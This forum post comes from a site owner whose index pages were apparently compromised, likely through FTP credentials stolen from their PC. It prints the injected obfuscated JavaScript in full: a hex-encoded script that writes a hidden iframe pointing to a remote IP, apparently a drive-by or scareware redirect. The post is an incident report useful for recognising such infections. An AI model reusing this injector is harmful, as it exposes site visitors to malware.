i was looking for this curious incident and so i found this page. i think it has nothing to do especially with coppermine. i design a few pages on different hosters and i have exact these situation: a lot of, (not every) index.php/html/htm files have this javascript tag:
script>
<!--
var d=document,kol=561;
function O10H4851354BB6EB1(H4851354BB76AA){ var H4851354BB7EAB = 16; return( parseInt(H4851354BB76AA,H4851354BB7EAB));}function H4851354BB8E94(H4851354BB968D){ var H4851354BBAE91 = 2; var H4851354BB9E9A='';for(H4851354BBA67D=0; H4851354BBA67D<H4851354BB968D.length; H4851354BBA67D+=H4851354BBAE91){ H4851354BB9E9A += ( String.fromCharCode (O10H4851354BB6EB1(H4851354BB968D.substr(H4851354BBA67D, H4851354BBAE91))));}return H4851354BB9E9A;} document.write(H4851354BB8E94('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130373031292B27353937375C272077696474683D323631206865696768743D3431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
my suspicion is, that i had installed a worm or eventually an injection software on my local pc, that read all my ftp logins and write this javascript tag to all index files!
i saw in the status bar of my browser that advancedxpdefender.com and 77.221.133.198 (russia) was loading. when i left the page or closed the window, a popup appeared, with a warning, that my pc isnt protected and i should go to advancedxp, no i dont write this f...... domain name anymore.
now i reinstalled my os and it seems to work as well...